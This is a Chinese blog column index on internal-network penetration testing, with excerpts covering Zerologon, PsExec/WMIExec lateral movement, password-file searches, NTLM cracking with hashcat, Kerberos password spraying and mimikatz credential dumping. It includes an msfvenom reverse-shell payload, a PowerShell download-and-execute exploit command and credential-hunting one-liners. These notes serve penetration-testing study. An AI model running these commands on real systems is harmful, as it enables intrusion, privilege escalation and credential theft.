内网渗透
文章平均质量分 82
内网安全
天问_Herbert555
努力把人生变成自己所期待的样子!
展开
-
域环境提权
文章目录NetLogon特权域控提权漏洞(CVE-2020-1472)复现NetLogon特权域控提权漏洞(CVE-2020-1472)复现简介CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。影响版本Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-原创 2021-11-09 15:01:02 · 3627 阅读 · 0 评论 -
常见横向移动手法
文章目录通过PsExec进行横向移动PsExec使用通过 WMIExec 来进⾏横向移动WMI使用方法通过PsExec进行横向移动PsExec 包含在 PsTools ⼯具包中,下载地址:https://download.sysinternals.com/files/PSTools.zip通过 PsExec 可以在远程⽬标主机上执⾏命令,也可以将管理员权限提升到 System 权限以运⾏指定的程序。PsExec 的基本原理是:通过管道在远程⽬标主机上创建⼀个 psexec 服务,并在本地磁盘中⽣成⼀原创 2021-11-08 09:48:37 · 3228 阅读 · 0 评论 -
内网搜集各类密码文件
文章目录dirfindstrdirdir 命令搜集各类敏感密码配置⽂件,在C盘中建议从 User ⽬录下开始搜集dir /b /s user.*,pass.*,config.*,username.*,password.*findstrfindstr 命令查找某个⽂件的某个字段,查找⼀个⽂件⾥有没有 user 、 pass 等字段内容shell findstr /c:"user" /c:"pass" /si *.txt...原创 2021-10-20 10:52:28 · 353 阅读 · 0 评论 -
MSF使用总结
文章目录生成小马文件运行小马维持会话生成小马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe生成的小马在root目录下运行小马// 进入msfmsfconsole// 监听use exploit/multi/handler// 设置payloadset payload windows/meterpreter/reverse_tcp// 设置s原创 2020-09-25 23:23:05 · 3625 阅读 · 0 评论 -
NTLM hash破解
hash-identifier识别hashhashcat指定字典破解kali自带字典:/usr/share/wordlists/rockyou.txthashcat -m 1000 -a 0 --force 1e14cbb32f5271876677e59d8ce3c060 pass.txt -m 指定模式 1000为ntlm v1 5600位ntlm v2 -a 指定破解模式 0位字典破解 然后后面为ntlm hash和字典掩码破解hashcat -m 1000 -a 3 --fo原创 2021-10-15 16:22:30 · 5062 阅读 · 0 评论 -
linux提权总结
命令提权GTFOBinshttps://github.com/diego-treitos/linux-smart-enumerationhttps://github.com/sleventyeleven/linuxprivcheckerhttps://github.com/mzet-/linux-exploit-suggester原创 2021-08-19 16:08:34 · 287 阅读 · 0 评论 -
域渗透总结
文章目录域内用户枚举和密码喷洒攻击(Password Spraying)域渗透之Kerberoast攻击请求服务票据导出服务票据离线破解域内用户枚举和密码喷洒攻击(Password Spraying)原理:在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击攻击下载地址:https://github.com/ropnop/ke原创 2021-08-02 16:05:33 · 416 阅读 · 0 评论 -
windows认证&密码抓取
文章目录基础知识windows版本历史一、工作组部分密码存放在哪里?NTML Hashwindows本地认证windows网络认证NTML v1与v2二、域部分kerbero协议白银票据黄金票据windows密码导出lsass进程抓取mimikatz直接操作lsass进程procdump+mimikatzWindows Server 2016抓取明文密码sam文件(密文,需要破解,或者通过hash传递使用)用工具读取sam文件注册表导出sam文件使用mimipenguin获取linux明文登录密码windo原创 2021-07-15 22:23:23 · 5684 阅读 · 9 评论 -
内网单机信息搜集
文章目录一、单机基础信息搜集1、查询操作系统版本:2、查看系统体系,判断位数:3、查看安装软件的版本及路径:4、查询机器服务信息:5、查询进程列表:6、查看机器自启动程序信息:7、查看计划任务:8、查看主机开机时间:9、查看本机用户列表:10、查询当前机器所有用户的详细信息11、查看本地管理员(包含域用户):12、查看当前在线用户:13、列出或断开本地计算机与所连接的客户端之间的会话:14、查询端口列表15、查看安装在系统中的补丁:16、查看本机共享列表和可访问的域共享列表:17、查询路由表及arp缓存:1原创 2021-10-20 10:51:47 · 1627 阅读 · 1 评论 -
隐藏通信隧道技术
文章目录0x00 隐藏通信隧道技术基础知识隐藏通信隧道概述判断内网连通性0x00 隐藏通信隧道技术基础知识隐藏通信隧道概述常用的隧道列举如如下:网络层:IPV6隧道、ICMP隧道、GRE隧道传输层:TCP隧道、UDP隧道、常规端口转发应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道判断内网连通性ICMP协议ping www.baidu.comTCP协议nc -zv 192.168.43.1 80HTTP协议curl ip地址:端口DNS协议nslookup原创 2021-07-01 14:31:32 · 408 阅读 · 0 评论 -
windows提权总结
文章目录0x01 使用ms16-032提权0x01 使用ms16-032提权exp地址:https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.12/Invoke-MS16-03原创 2021-01-15 00:28:51 · 3948 阅读 · 1 评论